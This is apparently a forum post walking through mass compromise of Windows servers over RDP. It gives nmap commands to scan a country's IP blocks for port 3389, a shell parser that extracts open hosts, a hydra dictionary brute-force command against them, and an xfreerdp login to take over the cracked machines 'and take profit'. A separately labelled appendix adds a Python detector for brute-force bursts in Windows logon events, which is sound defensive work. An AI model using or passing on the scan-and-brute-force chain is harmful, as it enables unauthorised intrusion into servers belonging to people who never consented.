CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // My experience in capturing dedicated servers
CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Wrap the next few lines in a script and create a few txt files
http://www.ipdeny.com/ipblocks/ - here you can look up the IP block lists for the country that interests you, but if you scan everything at once you will see the results only next year.
So don't be greedy: scan a small subnet of interest, keep a journal and write down the scanned ranges.
Code:
c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vv
CREATE PARSER FILE (to select only OK IP's list): // create a sorting machine which will extract IPs with an open RDP port
Code:
p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d >> $p/openedServers.txt
rm $p/scanGhostFile.txt
PUT HYDRA COMMAND (Best 4 Brute on Linux or use Metasploit experience): // nothing more fun than hydra was found; crowbar gives misses and stalls,
so upload a few top-ten dictionaries (admin - password). Hydra is good because it does not load the processor much and can brute all day and all night without a pause.
The best solution, I think, is to exploit the sorted IPs with the help of Metasploit, but that is a topic for another article because I do not see fast and standard solutions for this.
Code:
hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdp
TO CONTROL REMOTE DESKTOP: // enter the exploited shells and take profit
Code:
xfreerdp /u:LOGIN /p: PASSWORD /v:IP:3389
Good Luck and feel free to comment.
We are anonysts we are Legion.
source: In search of the best algorithm for capturing dedicated servers in 2K18
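Seen from the defending side, the activity this post describes (many logins and passwords tried against port 3389 from one source) appears as a burst of failed logons in the Windows Security log. The following is an added example, not part of the original post: it assumes a simplified, constructed CSV export of events 4625 and 4624, and the function name `detect` and its thresholds are illustrative.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: simplified export of Windows Security events as
# time, event id, logon type, source IP, target user. 4625 = failed logon,
# 4624 = success; RDP shows as type 10, or type 3 when NLA is enabled.
SAMPLE = """\
2018-03-01T02:00:01,4625,3,203.0.113.7,admin
2018-03-01T02:00:03,4625,3,203.0.113.7,administrator
2018-03-01T02:00:05,4625,3,203.0.113.7,user
2018-03-01T02:00:08,4625,3,203.0.113.7,test
2018-03-01T02:00:10,4625,3,203.0.113.7,admin
2018-03-01T02:00:12,4624,3,203.0.113.7,admin
2018-03-01T09:15:00,4625,10,198.51.100.20,alice
2018-03-01T09:15:30,4624,10,198.51.100.20,alice
"""

def detect(lines, window=timedelta(minutes=5), threshold=5):
    """Return {ip: {"failures", "users", "success_after_burst"}} for sources
    that reach `threshold` failed logons inside `window`."""
    recent = defaultdict(deque)   # ip -> (time, user) failures still in window
    alerts = {}
    for line in lines:
        if not line.strip():
            continue
        ts, event, ltype, ip, user = line.strip().split(",")
        if ltype not in ("3", "10"):
            continue
        when = datetime.fromisoformat(ts)
        q = recent[ip]
        while q and when - q[0][0] > window:
            q.popleft()           # expire failures older than the window
        if event == "4625":
            q.append((when, user))
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "users": set(),
                                           "success_after_burst": None})
                a["failures"] = max(a["failures"], len(q))
                a["users"] |= {u for _, u in q}
        elif event == "4624" and ip in alerts and len(q) >= threshold:
            # A success right after a burst means a guess probably worked.
            alerts[ip]["success_after_burst"] = user
    return alerts

if __name__ == "__main__":
    for ip, a in detect(SAMPLE.splitlines()).items():
        print(ip, a["failures"], sorted(a["users"]), a["success_after_burst"])
```

A source that cycles through several account names and then logs in successfully is the case to triage first; a single mistyped password followed by a success, as in the second source of the sample, raises no alert.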